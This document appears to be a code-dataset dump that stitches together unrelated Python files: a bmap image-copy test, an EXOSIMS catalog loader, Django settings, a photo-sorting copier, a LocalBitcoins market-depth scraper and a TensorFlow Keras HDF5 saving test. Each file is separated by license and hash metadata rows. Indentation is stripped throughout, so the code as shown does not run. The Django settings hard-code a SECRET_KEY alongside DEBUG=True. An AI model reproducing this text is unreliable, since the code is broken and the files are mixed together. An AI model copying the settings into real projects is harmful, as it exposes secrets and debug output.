file_obj = tempfile.NamedTemporaryFile("wb+", prefix="4Kmapped_minus_1_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, block_size - 1)
yield (file_obj, block_size - 1, [(0, 0)], [])
file_obj.close()
# A 1-byte file
file_obj = tempfile.NamedTemporaryFile("wb+", prefix="1byte_mapped_",
delete=delete, dir=directory,
suffix=".img")
_create_random_file(file_obj, 1)
yield (file_obj, 1, [(0, 0)], [])
file_obj.close()
# And 10 mapped files of random size
for i in xrange(10):
size = random.randint(1, max_size)
file_obj = tempfile.NamedTemporaryFile("wb+", suffix=".img",
delete=delete, dir=directory,
prefix="rand_mapped_%d_" % i)
_create_random_file(file_obj, size)
blocks_cnt = (size + block_size - 1) / block_size
yield (file_obj, size, [(0, blocks_cnt - 1)], [])
file_obj.close()
def calculate_chksum(file_path):
"""Calculates checksum for the contents of file 'file_path'."""
file_obj = TransRead.TransRead(file_path)
hash_obj = hashlib.new("sha256")
chunk_size = 1024*1024
while True:
chunk = file_obj.read(chunk_size)
if not chunk:
break
hash_obj.update(chunk)
file_obj.close()
return hash_obj.hexdigest()
def copy_and_verify_image(image, dest, bmap, image_chksum, image_size):
"""
Copy image 'image' using bmap file 'bmap' to the destination file 'dest'
and verify the resulting image checksum.
"""
f_image = TransRead.TransRead(image)
f_dest = open(dest, "w+")
if (bmap):
f_bmap = open(bmap, "r")
else:
f_bmap = None
writer = BmapCopy.BmapCopy(f_image, f_dest, f_bmap, image_size)
# Randomly decide whether we want the progress bar or not
if bool(random.getrandbits(1)):
writer.set_progress_indicator(sys.stdout, None)
writer.copy(bool(random.getrandbits(1)), bool(random.getrandbits(1)))
# Compare the original file and the copy are identical
assert calculate_chksum(dest) == image_chksum
if f_bmap:
f_bmap.close()
f_dest.close()
f_image.close()
|
gpl-2.0
| -6,630,529,943,013,134,000 | 35.635135 | 80 | 0.57239 | false |
dsavransky/EXOSIMS
|
EXOSIMS/StarCatalog/SIMBAD300Catalog.py
|
1
|
1291
|
# -*- coding: utf-8 -*-
from EXOSIMS.StarCatalog.SIMBADCatalog import SIMBADCatalog
from EXOSIMS.util.get_dirs import get_cache_dir
import os, inspect
class SIMBAD300Catalog(SIMBADCatalog):
"""SIMBAD300 Catalog class
This class populates the star catalog used in EXOSIMS from the SIMBAD300
catalog.
"""
def __init__(self, cachedir=None, **specs):
self.cachedir = get_cache_dir(cachedir)
classpath = os.path.split(inspect.getfile(self.__class__))[0]
filename = 'SIMBAD300'
pklpath = os.path.join(self.cachedir, filename + '.pkl')
matpath = os.path.join(classpath, filename + '.mat')
# check if given filename exists as .pkl file already
if os.path.exists(pklpath):
self.populatepkl(pklpath, **specs)
self.vprint('Loaded %s.pkl star catalog'%filename)
# check if given filename exists as a .mat file but not .pkl file
elif os.path.exists(matpath):
self.SIMBAD_mat2pkl(matpath, pklpath)
self.populatepkl(pklpath, **specs)
self.vprint('Loaded %s.mat star catalog'%filename)
# otherwise print error
else:
self.vprint('Could not load SIMBAD300 star catalog')
|
bsd-3-clause
| 8,737,107,476,047,672,000 | 38.34375 | 77 | 0.620449 | false |
thedanotto/google-maps-urlerator
|
google_maps_urlerator/settings/local_mini.py
|
1
|
4841
|
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'google_maps_urlerator.sqlite3', # Or path to database file if using sqlite3.
# The following settings are not used with sqlite3:
'USER': '',
'PASSWORD': '',
'HOST': '', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
}
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'static-only')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'static'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'hk)&m=(63&&dmy2501(z3$k(1zbav7*ubsa@4_f7crig-p8#c%'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'google_maps_urlerator.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'google_maps_urlerator.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))), 'static', 'templates'),
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'stripe',
'registration',
'south',
'urlerator',
)
|
mit
| 3,139,702,584,782,255,000 | 36.246154 | 127 | 0.706259 | false |
virantha/photokeeper
|
photokeeper/filecopy.py
|
1
|
2553
|
# Copyright 2016 Virantha Ekanayake All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import os, shutil, logging
from photokeeper.target import TargetBase
class FileCopy(TargetBase):
def __init__(self):
pass
def check_duplicates(self, images):
""" This is easy, since all the functionality is built into the source image file
object
"""
print("Checking for duplicates")
images_1, images_2 = itertools.tee(images)
for total,img in enumerate(images_1):
if img.is_duplicate():
img.dup = True
n_dups = [i for i in images_2 if i.dup]
print('Found {} duplicates out of {} images'.format(len(n_dups), total+1))
def _get_unique_filename_suffix(self, filename):
dirname = os.path.dirname(filename)
fn_with_ext = os.path.basename(filename)
fn, ext = os.path.splitext(fn_with_ext)
suffix = 1
if not os.path.exists(filename): # Unique, no target filename conflict
return filename
else:
while os.path.exists(os.path.join(dirname, fn+'_'+str(suffix)+ext)):
suffix += 1
return (os.path.join(dirname, fn+'_'+str(suffix)+ext))
def execute_copy(self, images):
skip_count = 0
print("Copying and sorting files")
for total, img in enumerate(images):
if img.dup:
skip_count+=1
continue
srcfn = img.srcpath
tgtfn = img.tgtpath
tgtdir = os.path.dirname(tgtfn)
tgtfn = self._get_unique_filename_suffix(tgtfn)
logging.info("Copying %s to %s" % (srcfn, tgtfn))
if not os.path.exists(tgtdir):
logging.info("Creating directory {}".format(tgtdir))
os.makedirs(tgtdir)
shutil.copyfile(srcfn, tgtfn)
print ("Skipped {} duplicate files".format(skip_count))
print ("Copied {} files".format(total+1-skip_count))
|
apache-2.0
| 1,588,081,966,827,932,400 | 34.458333 | 89 | 0.617313 | false |
breeezzz/local-bitcoins-api
|
LocalBitcoins/market_depth.py
|
1
|
6253
|
'''
Created on 7 Jun 2013
@author: Jamie
'''
import urllib2
import math
import re
import itertools
import argparse
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
markets = {'UK': {'url': 'gb/united%20kingdom/', 'curr': 'GBP'},
'USA': {'url': 'us/united%20states/', 'curr': 'USD'},
'GERMANY': {'url': 'de/germany/', 'curr': 'EUR'},
'ITALY': {'url': 'it/italy/', 'curr': 'EUR'},
'SPAIN': {'url': 'es/spain/', 'curr': 'EUR'},
'AUSTRALIA': {'url': 'au/australia/', 'curr': 'AUD'},
'ARGENTINA': {'url': 'ar/argentina/', 'curr': 'ARS'},
'NETHERLANDS': {'url': 'nl/netherlands/', 'curr': 'EUR'},
'BRAZIL': {'url': 'br/brazil/', 'curr': 'BRL'},
'FRANCE': {'url': 'fr/france/', 'curr': 'EUR'},
'GBP': {'url': 'gbp/', 'curr': 'GBP'},
'USD': {'url': 'usd/', 'curr': 'USD'},
'EUR': {'url': 'eur/', 'curr': 'EUR'},
}
methods = {'NATIONAL_BANK_TRANSFER': 'national-bank-transfer/'}
method = ''
buy_url = 'https://localbitcoins.com/buy-bitcoins-online/'
sell_url = 'https://localbitcoins.com/sell-bitcoins-online/'
def get_ads_dict(soup, buy_sell):
prices = get_prices(soup)
users = get_users(soup)
amounts = get_amounts(soup)
amounts = [a/p for a,p in zip(amounts, prices)] # To give amount in BTC
currency = get_currency(soup)
methods = get_methods(soup)
lists = set(zip(prices, users, amounts, currency))
if buy_sell == 'buy':
sorted_ads = sorted(lists)
elif buy_sell == 'sell':
sorted_ads = sorted(lists)[::-1]
prices = [item[0] for item in sorted_ads]
users = [item[1] for item in sorted_ads]
amounts = [item[2] for item in sorted_ads]
currency = [item[3] for item in sorted_ads]
depth = get_depth(amounts)
ads_dict = {'users': users, 'prices': prices, 'amounts': amounts,
'depth': depth, 'currency': currency, 'methods': methods}
return ads_dict
def get_prices(soup):
''' Returns a list of prices '''
prices = soup.find_all('td', attrs={'class':"column-price"})
prices = [float(re.findall("\d+.\d+", price.get_text())[0]) for price in prices]
return prices
def get_currency(soup):
''' Returns a list of currencies '''
prices = soup.find_all('td', attrs={'class':"column-price"})
currencies = [price.get_text().split()[-1] for price in prices]
return currencies
def get_methods(soup):
''' Returns a list of payment methods '''
methods = soup.find_all('tr', attrs={'class':"clickable"})
methods = [method.get_text().split('\n')[-7].strip() for method in methods]
return methods
def get_users(soup):
''' Returns a list of users '''
users = soup.find_all('td', attrs={'class':"column-user"})
users = [user.get_text().split()[0] for user in users]
return users
def get_amounts(soup):
''' Returns a list of amounts '''
raw_amounts = soup.find_all('td', attrs={'class':"column-limit"})
amounts = []
for amount in raw_amounts:
try:
amounts += [float(amount.get_text().split()[2])]
except:
amounts += [0.0]
return amounts
def get_depth(amounts):
''' Generates the cumulative amount for each point on the curve '''
cum_amounts = []
cum_amount = 0
for amount in amounts:
cum_amount += amount
cum_amounts += [cum_amount]
return cum_amounts
def get_buy_curve(market):
response = urllib2.urlopen(buy_url + market['url'] + method)
soup = BeautifulSoup(response)
buy_ads = get_ads_dict(soup, 'buy')
buy_prices = [i for i,j in zip(buy_ads['prices'], buy_ads['currency']) if j == market['curr']]
buy_depth = [i for i,j in zip(buy_ads['depth'], buy_ads['currency']) if j == market['curr']]
buy_prices = double_list(buy_prices)[1:]
buy_depth = double_list(buy_depth)[:-1]
return buy_prices[:-2], buy_depth[:-2]
def get_sell_curve(market):
response = urllib2.urlopen(sell_url + market['url'] + method)
soup = BeautifulSoup(response)
sell_ads = get_ads_dict(soup, 'sell')
sell_prices = [i for i,j in zip(sell_ads['prices'], sell_ads['currency']) if j == market['curr']][::-1]
sell_depth = [i for i,j in zip(sell_ads['depth'], sell_ads['currency']) if j == market['curr']][::-1]
sell_prices = double_list(sell_prices)[1:]
sell_depth = double_list(sell_depth)[:-1]
return sell_prices, sell_depth
def plot_chart(ax, buy, sell):
ax.plot(buy[0], buy[1], color='r')
ax.plot(sell[0], sell[1], color='g')
def double_list(list_in):
iters = [iter(list_in), iter(list_in)]
return list(it.next() for it in itertools.cycle(iters))
def get_bid(country):
market = markets[country]
response = urllib2.urlopen(buy_url + market['url'] + method)
soup = BeautifulSoup(response)
buy_ads = get_ads_dict(soup, 'buy')
bid = buy_ads['prices'][0]
return bid
def get_ask(country):
market = markets[country]
response = urllib2.urlopen(sell_url + market['url'] + method)
soup = BeautifulSoup(response)
sell_ads = get_ads_dict(soup, 'sell')
ask = sell_ads['prices'][0]
return ask
def make_charts(*args):
if len(args[0].countries) == 0:
selection = ['UK','USA','SPAIN','FRANCE','GERMANY','BRAZIL']
else:
selection = args[0].countries
fig = plt.figure()
dim = math.ceil(len(selection)**0.5)
for x, s in enumerate(selection):
market = markets[s]
# method = methods['NATIONAL_BANK_TRANSFER']
ax = fig.add_subplot(dim, dim, x+1)
ax.set_xlabel(market['curr'])
ax.set_ylabel('BTC')
ax.set_title('Local Bitcoins online: %s' % s)
buy_curve = get_buy_curve(market)
sell_curve = get_sell_curve(market)
plot_chart(ax, buy_curve, sell_curve)
plt.tight_layout()
plt.show()
def main():
parser = argparse.ArgumentParser(description='Display charts of the Local Bitcoin market depth.')
parser.add_argument('countries', type=str, nargs='*',
help='optionally specify any number of country names')
args = parser.parse_args()
make_charts(args)
if __name__ == '__main__':
main()
|
mit
| -5,073,392,285,492,566,000 | 34.731429 | 107 | 0.592196 | false |
jhseu/tensorflow
|
tensorflow/python/keras/saving/hdf5_format_test.py
|
1
|
46964
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#,============================================================================
"""Tests for model saving in the HDF5 format."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import optimizers
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.saving import hdf5_format
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training import training as training_module
from tensorflow.python.training.tracking import util as trackable
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase, parameterized.TestCase):
@keras_parameterized.run_with_all_saved_model_formats
@test_util.run_in_graph_and_eager_modes
def test_weight_loading(self):
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
saved_model_dir = os.path.join(temp_dir, 'saved_model')
save_format = testing_utils.get_save_format()
with self.cached_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
model.save_weights(saved_model_dir, save_format=save_format)
model.load_weights(saved_model_dir)
y = model.predict(x)
self.assertAllClose(ref_y, y)
@test_util.run_in_graph_and_eager_modes
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRUV1(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTMV1(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = hdf5_format.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = hdf5_format.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
@parameterized.named_parameters(
('gru', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5)
}),
('gru_with_reset_after', keras.layers.GRU, {
'units': 2,
'input_shape': (3, 5),
'reset_after': True
}),
('lstm', keras.layers.LSTM, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnngru', keras.layers.CuDNNGRU, {
'units': 2,
'input_shape': (3, 5)
}),
('cudnnlstm', keras.layers.CuDNNLSTM, {
'units': 2,
'input_shape': (3, 5)
}))
def test_preprocess_weights_for_loading_rnn_should_be_idempotent(
self, layer_class, layer_args):
with self.cached_session():
layer = layer_class(**layer_args)
layer.build(input_shape=layer_args.get('input_shape'))
weights1 = layer.get_weights()
weights2 = hdf5_format.preprocess_weights_for_loading(
layer, weights1)
_ = [
self.assertAllClose(x, y, rtol=1e-05)
for (x, y) in zip(weights1, weights2)
]
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
x = np.random.random((batch_size, input_dim))
ref_y = model.predict(x)
model.save_weights(h5_path)
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, input_dim=input_dim))
model.add(keras.layers.Dense(num_classes))
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@keras_parameterized.run_with_all_saved_model_formats
@test_util.run_in_graph_and_eager_modes
def test_nested_model_weight_loading(self):
save_format = testing_utils.get_save_format()
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
saved_model_dir = os.path.join(temp_dir, 'saved_model')
batch_size = 5
shape = (None, None, 3)
with self.cached_session():
def gen_model():
def seq_model():
model = keras.models.Sequential([
keras.layers.Conv2D(3, 1, input_shape=shape),
keras.layers.BatchNormalization()])
return model
x = inner_inputs = keras.layers.Input((None, None, 3))
x = seq_model()(x)
x = seq_model()(x)
inner_model = keras.models.Model(inner_inputs, x)
inputs = keras.layers.Input(shape)
return keras.models.Model(inputs, inner_model(inputs))
model = gen_model()
x = np.random.random((batch_size, 1, 1, 3))
ref_y = model.predict(x)
model.save_weights(saved_model_dir, save_format=save_format)
model = gen_model()
model.load_weights(saved_model_dir)
y = model.predict(x)
self.assertAllClose(y, ref_y)
@test_util.run_in_graph_and_eager_modes
def test_sequential_weight_loading_group_name_with_incorrect_length(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer='rmsprop',
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden, use_bias=False,
input_dim=input_dim, name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer='rmsprop',
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named \"d1\"\) expects 1 '
r'weight\(s\), but the saved weights have 2 '
r'element\(s\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
hdf5_format.load_weights_from_hdf5_group_by_name(
f_model, model.layers, skip_mismatch=True)
self.assertAllClose(keras.backend.get_value(ref_model.layers[1].kernel),
keras.backend.get_value(model.layers[1].kernel))
@test_util.run_deprecated_v1
def test_sequential_weight_loading_group_name_with_incorrect_shape(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
num_classes = 2
with self.cached_session():
ref_model = keras.models.Sequential()
ref_model.add(keras.layers.Dense(num_hidden, input_dim=input_dim,
name='d1'))
ref_model.add(keras.layers.Dense(num_classes, name='d2'))
ref_model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
f_ref_model = h5py.File(h5_path, 'w')
keras.backend.set_value(ref_model.layers[1].bias, [3.5] * num_classes)
hdf5_format.save_weights_to_hdf5_group(f_ref_model, ref_model.layers)
f_model = h5py.File(h5_path, 'r')
model = keras.models.Sequential()
model.add(keras.layers.Dense(num_hidden + 5, input_dim=input_dim,
name='d1'))
model.add(keras.layers.Dense(num_classes, name='d2'))
model.compile(loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[keras.metrics.categorical_accuracy])
with self.assertRaisesRegexp(ValueError,
r'Layer #0 \(named "d1"\), weight '
r'<tf\.Variable \'d1_1\/kernel:0\' '
r'shape=\(3, 10\) dtype=float32> has '
r'shape \(3, 10\), but the saved weight has '
r'shape \(3, 5\)\.'):
hdf5_format.load_weights_from_hdf5_group_by_name(f_model, model.layers)
hdf5_format.load_weights_from_hdf5_group_by_name(
f_model, model.layers, skip_mismatch=True)
self.assertAllClose([3.5] * num_classes,
keras.backend.get_value(model.layers[1].bias))
@keras_parameterized.run_with_all_saved_model_formats
class TestWholeModelSaving(test.TestCase, parameterized.TestCase):
def _save_model_dir(self, dirname='saved_model'):
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
return os.path.join(temp_dir, dirname)
def test_sequential_model_saving(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizer_v2.rmsprop.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
weighted_metrics=[
keras.metrics.categorical_crossentropy,
keras.metrics.CategoricalCrossentropy(
name='cce', label_smoothing=constant_op.constant(0.2)),
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
# test that new updates are the same with both models
model.train_on_batch(x, y)
new_model.train_on_batch(x, y)
eval_out = model.evaluate(x, y)
eval_out2 = new_model.evaluate(x, y)
self.assertArrayNear(eval_out, eval_out2, 0.001)
out = model.predict(x)
out2 = new_model.predict(x)
# The model has been trained on two batches. So the tolerance is larger.
self.assertAllClose(out, out2, atol=0.01)
@test_util.run_deprecated_v1
def test_sequential_model_saving_without_input_shape(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
out = model.predict(x)
model.save(saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
def test_sequential_model_saving_without_compile(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
x = np.random.random((1, 3))
out = model.predict(x)
# Save the model without any compilation or training.
keras.models.save_model(model, saved_model_dir, save_format=save_format)
new_model = keras.models.load_model(saved_model_dir)
out2 = new_model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_sequential_model_saving_2(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
# test with custom optimizer, loss
class CustomOp(keras.optimizers.RMSprop):
pass
def custom_loss(y_true, y_pred):
return keras.losses.mse(y_true, y_pred)
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.Dense(3))
model.compile(loss=custom_loss, optimizer=CustomOp(), metrics=['acc'])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
out = model.predict(x)
keras.models.save_model(model, saved_model_dir, save_format=save_format)
model = keras.models.load_model(
saved_model_dir,
custom_objects={'CustomOp': CustomOp,
'custom_loss': custom_loss})
out2 = model.predict(x)
self.assertAllClose(out, out2, atol=1e-05)
@test_util.run_deprecated_v1
def test_functional_model_saving(self):
saved_model_dir = self._save_model_dir()
save_format = testing_utils.get_save_format()
with self.cached_session():
inputs = keras.layers.Input(shape=(3,))
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(lr=0.0001),
metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
],
weighted_metrics=[
keras.metrics.categorical_accuracy,
keras.metrics.CategoricalAccuracy()
])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
